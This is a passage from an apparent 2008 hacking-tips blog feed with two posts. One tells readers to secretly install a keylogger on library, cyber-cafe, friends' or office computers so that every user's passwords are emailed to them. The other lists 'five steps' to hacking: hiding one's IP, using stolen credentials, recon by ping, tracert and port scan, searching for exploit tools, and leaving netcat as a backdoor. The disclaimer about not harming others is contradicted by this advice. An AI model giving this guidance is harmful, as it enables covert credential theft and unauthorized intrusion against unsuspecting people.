href="http://en.wikipedia.org/wiki/IP_address">IP Address</a>.Unknownnoreply@blogger.com6tag:blogger.com,1999:blog-7676927499895359147.post-41802366039307633462008-07-25T04:50:00.000-07:002008-07-25T05:16:11.226-07:00Simple Technique to get other's user name and passwordOne of the most simplest technique which i often use is key logger.<br /><br />These are the following steps you need to do with key logger :-<br /><br />1. Download it from <a href="http://www.refog.com/">here</a>. Want to download <a href="http://how-to-answers.blogspot.com/2008/07/how-to-downlaod-free-key-loggers.html">free key logger</a>.<br /><br />2. Install its setup to public libraries, cyber cafes, your friend computer or your office computer.<br /><br />3. Hide it after mentioning your email id into this software.<br /><br />4. Check your email, you start getting user name and password of everybody who use that computer. And their is very basic thing about user name and password. People often have same password for all the services they used.Unknownnoreply@blogger.com26tag:blogger.com,1999:blog-7676927499895359147.post-2190919705053038572008-07-25T04:01:00.000-07:002009-10-07T07:47:24.122-07:00Learn Hacking in 5 easy stepsFirst of all I wanna tell you that hacking is a art. I am teaching you this art so that you can make yourself more secure. I don't want you to use my techniques to harm others because hackers never harm others, crackers do. And we are Hackers not cracker.<br />
<br />
There are 5 easy steps to learn Hacking :-<br />
<br />
1. Take all safety Measures to hide yourself from target.<br />
<br />
There are lots of techniques to hide yourself from target computer. I recommend you to use as much techniques as you can.<br />
<br />
I am mentioning few important tricks below :-<br />
<ul><li>Use <a href="http://www.google.com/search?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&q=hide+ip">Hide Ip</a><a href="http://www.google.com/custom?hl=en&safe=active&client=pub-6668859389722144&channel=3284768262&cof=FORID%3A1%3BAH%3Aleft%3BCX%3AHacking%2520Techniques%3BL%3Ahttp%3A%2F%2Fwww.google.com%2Fcoop%2Fintl%2Fen%2Fimages%2Fcustom_search_sm.gif%3BLH%3A65%3BLP%3A1%3BLC%3A%230000ff%3BVLC%3A%23663399%3BGFNT%3A%230000ff%3BGIMP%3A%230000ff%3BDIV%3A%23336699%3B&adkw=AELymgX0IEIPEa1JiWDCq_bsNm9z-dABZlTN62ET45KCVlIB8xdZM7MbBVYMmX2xrF5RgI1A9AUw3Ir1QnwLsGl_VUYSXIzkoCq_VyMqq12cjmpl3mWP5hnwZMZ52kFteyxYKG_cPF3s&ie=ISO-8859-1&oe=ISO-8859-1&q=hide+ip+&btnG=Search&cx=partner-pub-6668859389722144%3Azb5o23-5gw3"> </a>Software :- This software will help you to hide your <a href="http://en.wikipedia.org/wiki/IP_address">IP address</a>.</li>
<li>Use <a href="http://www.download.com/3120-20_4.html?tg=dl-20&qt=firewalls&tag=srch">Firewall</a> :- <a href="http://en.wikipedia.org/wiki/Firewall">Firewall</a> secure your computer as well as restrict any personal information from going outside.</li>
<li>Use <a href="http://www.publicproxyservers.com/">Proxy servers</a> :- Whenever you want to surf the computer of your target use proxy servers.</li>
<li>Use others username and password :- Try to avoid using your own user name and password for internet connection. <a href="http://5steps2hack.blogspot.com/2008/07/simple-technique-to-get-others-user.html">Learn the technique</a> to get other's user name and password.<br />
</li>
</ul><br />
<br />
<br />
2. Find out the <a href="http://en.wikipedia.org/wiki/IP_address">IP Address</a> of Target Computer.<br />
<ul><li> what is Ip address :- It's full form is Internet Protocol Address. Protocol means the way computer talks to each other and Internet protocol means , way in which two computer talks to each on internet. So the complete meaning of Ip address is address of a computer who wants to talk to other computers on internet.</li>
<ul><li>There are two important things about ip address :-</li>
<ul><li>it is unique for every computer.</li>
<li>it is needed every time we connect to internet.</li>
</ul>
</ul>
<li>Use of IP address in Hacking :- Ip address is one of the most important part of hacking. To learn its importance in hacking first of all we need to know <a href="http://5steps2hack.blogspot.com/2008/07/what-is-hacking.html">what is hacking</a>. All i can say here is that if we don't know the ip address of target computer we can't able to move single step forward in getting access to target computer.</li>
<li>Ways to find out IP address :-</li>
<ul><li><a href="http://5steps2hack.blogspot.com/2008/07/use-of-ping-to-get-ip-address.html">Ping</a></li>
<li><a href="http://5steps2hack.blogspot.com/2008/07/how-to-use-tracert.html">tracert</a></li>
<li><a href="http://5steps2hack.blogspot.com/2008/07/dns-query-use-to-find-ip-address.html">dns query</a></li>
</ul>
</ul><br />
<br />
3.Gather information about target computer such as its <a href="http://en.wikipedia.org/wiki/Operating_system">operating system</a> ,time,date etc etc .<br />
<ul><li>What 's the need ?</li>
<ul><li>To be able to know weaknesses of target computer.</li>
<li>To exploit those weakness.</li>
<li>Learn more how we can exploit it.<br />
</li>
</ul>
<li>How to gather information?</li>
<ul><li><a href="http://skullbox.net/telnethack.php">Telnet</a></li>
<li><a href="http://5steps2hack.blogspot.com/2008/07/dns-query-use-to-find-ip-address.html">Dns Query</a></li>
<li><a href="http://5steps2hack.blogspot.com/2008/07/using-port-scanning-for-hacking.html">Port Scan</a></li>
<li><a href="http://5steps2hack.blogspot.com/2008/07/how-to-use-tracert.html">tracert</a></li>
</ul>
</ul><br />
<br />
4.Use <a href="http://how-to-answers.blogspot.com/2007/01/how-to-get-better-search-results.html">Search engine</a> (according to information obtained from above steps) to get <a href="http://www.thenetworkadministrator.com/2003MostPopularHackingTools.htm">tools</a> which will help us to hack target computer.<br />
<br />
Search engines like <a href="http://www.google.com/">google</a> are very close friends of hackers. If we do all the things mentioned above we know exactly where <a href="http://www.techweb.com/encyclopedia/defineterm.jhtml?term=vulnerability">vulnerability</a> lies in target computer. To use that vulnerability we search for available tools on google.com. After downloading specific <a href="http://www.thenetworkadministrator.com/2003MostPopularHackingTools.htm">tools</a> we need <a href="http://en.wikipedia.org/wiki/IP_address">IP Address</a> of target computer ( we already know) to get access on other computer.<br />
<a href="http://5steps2hack.blogspot.com/2008/07/using-vulnerabilities-for-hacking.html"><br />
Learn to use that vulnerability</a><br />
<br />
5. Leave one or two files on the target computer so to get easy access in future.<br />
To get access again and again hackers usually leave files on target computer. For eg <a href="http://netcat.sourceforge.net/download.php">Net cat</a> which allow them to get access again and again. Download netcatUnknownnoreply@blogger.com266